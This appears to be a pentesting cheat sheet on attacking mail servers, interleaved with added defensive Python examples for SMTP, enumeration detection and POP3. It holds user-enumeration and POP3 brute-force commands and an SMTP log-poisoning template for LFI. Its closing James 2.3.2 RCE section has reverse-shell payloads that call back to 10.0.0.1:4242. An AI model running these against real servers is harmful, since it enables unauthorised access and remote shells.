Mail Servers

SMTP [Port 25]

  • SMTP stands for Simple Mail Transfer Protocol.

  • It is a TCP/IP protocol that’s used for sending emails.

In order to send emails with SMTP we first have to know how a mail transaction works:

  1. SMTP sessions are initiated after the client opens a TCP/IP connection to the server and the server responds with a greeting (220)

  2. The client sends a HELO or EHLO with the client's identity (example: HELO hackertarget.com, which means "Hi, I'm hackertarget.com")

  3. Now the client has to perform 3 steps, each separated by a CRLF, for a valid SMTP mail transaction:

    • Step 1: MAIL: This tells the server "Hey, we're starting a new email, reset your state". This is where the email "from" is specified.

    • Step 2: RCPT: Tells the server where (to whom) we want to send the email.

    • Step 3: DATA: This is where the Subject and body of the email are set, and the client indicates the end of the mail data by a new line containing only ".". This tells the server that the client confirms the email and tells the server to process it and send it.
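The three-step transaction above, played out from the server's side, as an added example that is not part of the original page: a small state machine that enforces the HELO/EHLO → MAIL → RCPT → DATA ordering, reads message lines until the line holding only ".", and undoes the client's dot-stuffing. The hostname, addresses and the client session are constructed values, not taken from the page.

```python
import re

# Server-side model of the SMTP mail transaction: greeting, HELO/EHLO, then
# MAIL -> RCPT -> DATA, with the data section ended by a line holding only ".".
# The hostname and every address used here are constructed example values.
class SmtpTransaction:
    def __init__(self, hostname="mail.example.test"):
        self.hostname = hostname
        self.greeted = False           # set once HELO/EHLO has been seen
        self.mail_from = None          # envelope sender from MAIL FROM
        self.rcpts = []                # envelope recipients from RCPT TO
        self.in_data = False           # True while collecting message lines after DATA
        self.data_lines = []
        self.messages = []             # accepted (mail_from, rcpts, body) tuples

    def feed(self, line):
        """Process one client line (CRLF already stripped); return the server reply or None."""
        if self.in_data:
            if line == ".":
                body = "\n".join(self.data_lines)
                self.messages.append((self.mail_from, list(self.rcpts), body))
                self.in_data, self.mail_from, self.rcpts, self.data_lines = False, None, [], []
                return "250 OK: queued"
            # dot-unstuffing: the client prefixes any data line starting with "." by one more "."
            self.data_lines.append(line[1:] if line.startswith(".") else line)
            return None                # the server stays silent until the terminator
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd in ("HELO", "EHLO"):
            self.greeted, self.mail_from, self.rcpts = True, None, []   # greeting also resets state
            return "250 %s Hello %s" % (self.hostname, arg)
        if cmd == "QUIT":
            return "221 %s closing connection" % self.hostname
        if not self.greeted:
            return "503 Bad sequence of commands: send HELO/EHLO first"
        if cmd == "MAIL":
            m = re.match(r"FROM:\s*<?([^>\s]*)>?", arg, re.I)   # accepts <addr> and bare addr
            if not m:
                return "501 Syntax: MAIL FROM:<address>"
            self.mail_from, self.rcpts = m.group(1), []           # MAIL starts a fresh transaction
            return "250 OK"
        if cmd == "RCPT":
            if self.mail_from is None:
                return "503 Bad sequence of commands: MAIL first"
            m = re.match(r"TO:\s*<?([^>\s]+)>?", arg, re.I)
            if not m:
                return "501 Syntax: RCPT TO:<address>"
            self.rcpts.append(m.group(1))
            return "250 OK"
        if cmd == "DATA":
            if not self.rcpts:
                return "503 Bad sequence of commands: RCPT first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        return "500 Command not recognized"


def run_session(client_lines, hostname="mail.example.test"):
    """Replay a client's lines through the state machine; return (replies, accepted messages)."""
    tx = SmtpTransaction(hostname)
    replies = [tx.feed(line) for line in client_lines]
    return replies, tx.messages


# Constructed client session exercising the three steps, including a dot-stuffed line.
SESSION = [
    "HELO client.example.test",
    "MAIL FROM:<alice@example.test>",
    "RCPT TO:<bob@example.test>",
    "RCPT TO:<carol@example.test>",
    "DATA",
    "Subject: test",
    "",
    "Hello Bob and Carol.",
    "..this line really starts with one dot",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    replies, messages = run_session(SESSION)
    for sent, reply in zip(SESSION, replies):
        print("C:", sent)
        if reply:
            print("S:", reply)
    print(messages)
```

Running the file prints the client/server exchange; the 503 replies show what a server does when MAIL, RCPT or DATA arrive out of order, and the MAIL regex accepts both the bracketed form and the bare `mail from:user@host` form used further down this page.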

telnet 192.168.1.107 25

User Enumeration

  • -M: EXPN, VRFY or RCPT

  • -U: File of usernames

vrfy raj@domainname

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

Email Enumeration

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107
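From the defender's side, the VRFY/EXPN/RCPT probing above leaves a recognisable pattern: many verification commands, or many rejected recipients, from one source in a short window. The following is an added example (not from the page or from smtp-user-enum) that flags such sources in a command log. The log format (`timestamp client-ip COMMAND argument reply-code`) and all entries are constructed for the example; a real MTA logs differently, so only the parser needs adapting.

```python
from collections import defaultdict
from datetime import datetime

# Constructed SMTP command log: one line per command, fields are
# "timestamp client-ip COMMAND argument reply-code". Not a real MTA format.
SAMPLE_LOG = """\
2024-05-01T10:00:01 198.51.100.7 EHLO scanner.example.test 250
2024-05-01T10:00:02 198.51.100.7 VRFY raj 252
2024-05-01T10:00:02 198.51.100.7 VRFY root 252
2024-05-01T10:00:03 198.51.100.7 VRFY admin 252
2024-05-01T10:00:03 198.51.100.7 EXPN staff 502
2024-05-01T10:00:04 198.51.100.7 VRFY postmaster 252
2024-05-01T10:00:04 198.51.100.7 VRFY guest 252
2024-05-01T10:00:10 203.0.113.9 EHLO laptop.example.test 250
2024-05-01T10:00:11 203.0.113.9 MAIL FROM:<alice@example.test> 250
2024-05-01T10:00:11 203.0.113.9 RCPT TO:<bob@example.test> 250
2024-05-01T10:00:12 203.0.113.9 DATA - 354
2024-05-01T10:05:00 192.0.2.5 RCPT TO:<old-alias@example.test> 550
2024-05-01T10:05:30 192.0.2.5 RCPT TO:<typo@example.test> 550
"""


def parse_log(text):
    """Yield (timestamp, client_ip, command, reply_code) for each non-empty log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, cmd, _arg, code = line.split()
        yield datetime.fromisoformat(ts), ip, cmd.upper(), int(code)


def max_in_window(times, window):
    """Largest number of events (sorted epoch seconds) that fall inside any span of `window` seconds."""
    best, start = 0, 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_enumeration(text, window=60, threshold=5):
    """Return {client_ip: probe_count} for sources whose verification probes
    (VRFY, EXPN, or RCPT answered 550 'unknown user') reach `threshold` inside `window` seconds."""
    probes = defaultdict(list)
    for ts, ip, cmd, code in parse_log(text):
        if cmd in ("VRFY", "EXPN") or (cmd == "RCPT" and code == 550):
            probes[ip].append(ts.timestamp())
    flagged = {}
    for ip, times in probes.items():
        times.sort()
        count = max_in_window(times, window)
        if count >= threshold:
            flagged[ip] = count
    return flagged


if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG))   # the scanner at 198.51.100.7 is flagged, the others are not
```

Counting VRFY and EXPN catches the `-M VRFY`/`-M EXPN` modes; counting 550-rejected RCPTs catches the `-M RCPT` mode, which still works when verification commands are disabled. The usual hardening is to turn those commands off (Postfix: `disable_vrfy_command = yes`) and to rate-limit recipients per client (Postfix: `smtpd_client_recipient_rate_limit`), which turns the enumeration into a slow, noisy activity that this kind of check picks up.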

IMAP [Port 143]

#

POP3 [Port 110]

#Banner grabbing
nc -nv 10.11.0.22 110 
telnet 10.10.10.17 110

#Login
user <username>
pass <password>

#Brute-force
nmap -sV --script=pop3-brute <target>

#List messages
list

#Read message number
retr 1
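The POP3 command sequence above (USER, PASS, LIST, RETR), shown as a complete exchange with both sides in one process: an added example, not code from the page. It starts a minimal mock POP3 server on a loopback port (the mailbox, the credentials and the messages are constructed example data) and drives it with the standard library's `poplib`, so the multi-line responses, the "." terminator and byte-stuffing can be seen working end to end.

```python
import poplib
import socket
import threading

# Constructed mailbox for the mock server: username -> (password, raw messages).
MAILBOX = {
    "raj": ("s3cret", [
        b"From: alice@example.test\r\nSubject: hello\r\n\r\nFirst message.\r\n.hidden dot line\r\n",
        b"From: bob@example.test\r\nSubject: again\r\n\r\nSecond message.\r\n",
    ]),
}


def _serve_one(conn):
    """Handle one POP3 session: AUTHORIZATION state (USER/PASS), then TRANSACTION state (LIST/RETR/QUIT)."""
    conn.settimeout(5)
    reader = conn.makefile("rb")
    conn.sendall(b"+OK mock POP3 ready\r\n")
    user, msgs = None, None            # msgs is set only after a successful PASS
    for raw in reader:
        cmd, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            conn.sendall(b"+OK send PASS\r\n")
        elif cmd == "PASS":
            entry = MAILBOX.get(user)
            if entry and entry[0] == arg:
                msgs = entry[1]
                conn.sendall(b"+OK logged in\r\n")
            else:
                conn.sendall(b"-ERR invalid credentials\r\n")   # same reply for bad user and bad password
        elif cmd == "QUIT":
            conn.sendall(b"+OK bye\r\n")
            break
        elif msgs is None:
            conn.sendall(b"-ERR authenticate first\r\n")
        elif cmd == "LIST":
            body = b"".join(b"%d %d\r\n" % (i + 1, len(m)) for i, m in enumerate(msgs))
            conn.sendall(b"+OK %d messages\r\n" % len(msgs) + body + b".\r\n")
        elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(msgs):
            msg = msgs[int(arg) - 1]
            # byte-stuffing: a line starting with "." gets one more "." so it is not taken as the terminator
            body = b"".join((b"." + l if l.startswith(b".") else l) + b"\r\n" for l in msg.splitlines())
            conn.sendall(b"+OK %d octets\r\n" % len(msg) + body + b".\r\n")
        else:
            conn.sendall(b"-ERR unknown command or message number\r\n")
    conn.close()


def start_mock_server():
    """Listen on an ephemeral loopback port and serve exactly one session in a background thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
        _serve_one(conn)

    threading.Thread(target=run, daemon=True).start()
    return port


def fetch_mailbox(port, username, password):
    """Client side of the USER / PASS / LIST / RETR 1 / QUIT sequence via poplib.
    Returns {"count": n, "first": text of message 1} or None if the server rejects the login."""
    client = poplib.POP3("127.0.0.1", port, timeout=5)
    try:
        client.user(username)
        client.pass_(password)
    except poplib.error_proto:
        client.close()
        return None
    _, listing, _ = client.list()      # listing is one b"<number> <octets>" entry per message
    if not listing:
        client.quit()
        return {"count": 0, "first": None}
    _, lines, _ = client.retr(1)       # poplib strips the terminator and undoes the byte-stuffing
    client.quit()
    return {"count": len(listing), "first": b"\n".join(lines).decode()}


if __name__ == "__main__":
    print(fetch_mailbox(start_mock_server(), "raj", "s3cret"))
    print(fetch_mailbox(start_mock_server(), "raj", "wrong"))   # None: login refused
```

The mock answers a bad user and a bad password with the same `-ERR` text, which is the behaviour a server should have so that the login step itself does not leak which usernames exist.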

#To send an email using SMTP for LFI /var/mail/ValidUserHere
EHLO hacker.anything.com
mail from:hacker@domain.com
rcpt to:victimemail@mail.com
data
Subject: email title
<your LFI code here>
<new blank line>
.
#the line containing only "." ends the DATA section and makes the server accept the message

Free Mail Server

  • hMailServer [Windows]

James 2.3.2 RCE

#Change payload in the script
payload = '/bin/bash -i >& /dev/tcp/10.0.0.1/4242 0>&1' 
payload = 'nc -e /bin/bash 10.0.0.1 4242 &'
